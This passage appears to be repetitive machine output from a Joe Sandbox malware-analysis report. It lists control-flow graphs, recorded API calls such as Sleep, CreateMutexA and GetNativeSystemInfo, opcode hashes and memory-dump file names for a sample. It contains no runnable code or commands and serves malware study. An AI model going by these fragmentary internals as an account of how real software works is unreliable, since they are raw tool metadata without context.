                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: edf22e771e30d252ff8cf92cb8af6461475dbcd150190529ae7bcef4560156ff
                                                                                                                                            • Instruction ID: b5a2cca7f5f20b4f70f2920883ccfe9bcde246c76684408a47ce1ed3f0dab563
                                                                                                                                            • Opcode Fuzzy Hash: edf22e771e30d252ff8cf92cb8af6461475dbcd150190529ae7bcef4560156ff
                                                                                                                                            • Instruction Fuzzy Hash: 6C318A71A041008BEF08DB7CCD89B6DBFB2EB82314F24862EE014973D5C77D8990829A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 330 499adc-499ae8 331 499aea-499af8 330->331 332 499afe-499d91 call 4ad663 call 4a7a00 call 495c10 call 498b30 call 4a8220 call 4a7a00 call 495c10 call 498b30 call 4a8220 330->332 331->332 333 49a917 331->333 335 49a953-49a994 Sleep CreateMutexA 333->335 336 49a917 call 4c6c6a 333->336 341 49a9a7-49a9a8 335->341 342 49a996-49a998 335->342 336->335 342->341 344 49a99a-49a9a5 342->344 344->341
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: 08d84f6ad45ebbaeaac718f7f9006caae30c2ec93615083aae3bce59a4e1aeab
                                                                                                                                            • Instruction ID: 59cd23c50276505d78a13ffbdfa7f617f832119d571fee56848e06f0bf1d2302
                                                                                                                                            • Opcode Fuzzy Hash: 08d84f6ad45ebbaeaac718f7f9006caae30c2ec93615083aae3bce59a4e1aeab
                                                                                                                                            • Instruction Fuzzy Hash: 0D216771A082409BEF189F2CDD89B6DBB61EBC2315F20462EE008873D4DB7D9990865A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 398 49a856-49a86e 399 49a89c-49a89e 398->399 400 49a870-49a87c 398->400 403 49a8a9-49a8b1 call 497d30 399->403 404 49a8a0-49a8a7 399->404 401 49a87e-49a88c 400->401 402 49a892-49a899 call 4ad663 400->402 401->402 405 49a94e-49a987 call 4c6c6a Sleep CreateMutexA 401->405 402->399 414 49a8b3-49a8bb call 497d30 403->414 415 49a8e4-49a8e6 403->415 407 49a8eb-49a916 call 4a80c0 404->407 419 49a98e-49a994 405->419 414->415 420 49a8bd-49a8c5 call 497d30 414->420 415->407 421 49a9a7-49a9a8 419->421 422 49a996-49a998 419->422 420->415 426 49a8c7-49a8cf call 497d30 420->426 422->421 424 49a99a-49a9a5 422->424 424->421 426->415 430 49a8d1-49a8d9 call 497d30 426->430 430->415 433 49a8db-49a8e2 430->433 433->407
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: dfdb9998d1f81ce23df627e41e08d53cdbf3f5647e557f1c4d90b11e7b8ba1b1
                                                                                                                                            • Instruction ID: c2762d82cee7abc65db3afc6c45529a70d7464c067f71a29f90154e1e65750cc
                                                                                                                                            • Opcode Fuzzy Hash: dfdb9998d1f81ce23df627e41e08d53cdbf3f5647e557f1c4d90b11e7b8ba1b1
                                                                                                                                            • Instruction Fuzzy Hash: C12108716592009AFF24F769898A73EBE519F81309F34093BE108963D1DA6D495182DF

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 375 49a34f-49a35b 376 49a35d-49a36b 375->376 377 49a371-49a39a call 4ad663 375->377 376->377 378 49a93a 376->378 383 49a3c8-49a916 call 4a80c0 377->383 384 49a39c-49a3a8 377->384 381 49a953-49a994 Sleep CreateMutexA 378->381 382 49a93a call 4c6c6a 378->382 390 49a9a7-49a9a8 381->390 391 49a996-49a998 381->391 382->381 385 49a3aa-49a3b8 384->385 386 49a3be-49a3c5 call 4ad663 384->386 385->378 385->386 386->383 391->390 395 49a99a-49a9a5 391->395 395->390
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: b491e166b07afd63665d987763936eade614fffe4201c72e624adaba67d3e4e4
                                                                                                                                            • Instruction ID: 07a1d40b51d422b0e679f2d478b43b5c79ef8c0cb97523eed3a571da48359814
                                                                                                                                            • Opcode Fuzzy Hash: b491e166b07afd63665d987763936eade614fffe4201c72e624adaba67d3e4e4
                                                                                                                                            • Instruction Fuzzy Hash: 08216771A082009BEF18DB2CDD8976DBB62EBD2315F20462FE404977D4DB7E9590829A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 527 497d30-497db2 call 4c40f0 531 497db8-497de0 call 4a7a00 call 495c10 527->531 532 498356-498373 call 4acff1 527->532 539 497de2 531->539 540 497de4-497e06 call 4a7a00 call 495c10 531->540 539->540 545 497e08 540->545 546 497e0a-497e23 540->546 545->546 549 497e25-497e34 546->549 550 497e54-497e7f 546->550 551 497e4a-497e51 call 4ad663 549->551 552 497e36-497e44 549->552 553 497e81-497e90 550->553 554 497eb0-497ed1 550->554 551->550 552->551 555 498374 call 4c6c6a 552->555 557 497e92-497ea0 553->557 558 497ea6-497ead call 4ad663 553->558 559 497ed3-497ed5 GetNativeSystemInfo 554->559 560 497ed7-497edc 554->560 568 498379-49837f call 4c6c6a 555->568 557->555 557->558 558->554 564 497edd-497ee6 559->564 560->564 566 497ee8-497eef 564->566 567 497f04-497f07 564->567 570 498351 566->570 571 497ef5-497eff 566->571 572 497f0d-497f16 567->572 573 4982f7-4982fa 567->573 570->532 575 49834c 571->575 576 497f29-497f2c 572->576 577 497f18-497f24 572->577 573->570 578 4982fc-498305 573->578 575->570 580 497f32-497f39 576->580 581 4982d4-4982d6 576->581 577->575 582 49832c-49832f 578->582 583 498307-49830b 578->583 586 498019-4982bd call 4a7a00 call 495c10 call 4a7a00 call 495c10 call 495d50 call 4a7a00 call 495c10 call 495730 call 4a7a00 call 495c10 call 4a7a00 call 495c10 call 495d50 call 4a7a00 call 495c10 call 495730 call 4a7a00 call 495c10 call 4a7a00 call 495c10 call 495d50 call 4a7a00 call 495c10 call 495730 call 4a7a00 call 495c10 call 4a7a00 call 495c10 call 495d50 call 4a7a00 call 495c10 call 495730 580->586 587 497f3f-497f9b call 4a7a00 call 495c10 call 4a7a00 call 495c10 call 495d50 580->587 584 4982d8-4982e2 581->584 585 4982e4-4982e7 581->585 590 49833d-498349 582->590 591 498331-49833b 582->591 588 49830d-498312 583->588 589 498320-49832a 583->589 584->575 585->570 593 4982e9-4982f5 585->593 627 4982c3-4982cc 586->627 612 497fa0-497fa7 587->612 588->589 595 498314-49831e 588->595 589->570 590->575 591->570 593->575 595->570 614 497fa9 612->614 615 497fab-497fcb call 4c8bbe 612->615 614->615 621 497fcd-497fdc 615->621 622 498002-498004 615->622 624 497fde-497fec 621->624 625 497ff2-497fff call 4ad663 621->625 626 49800a-498014 622->626 622->627 624->568 624->625 625->622 626->627 627->573 629 4982ce 627->629 629->581
                                                                                                                                            APIs
                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00497ED3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
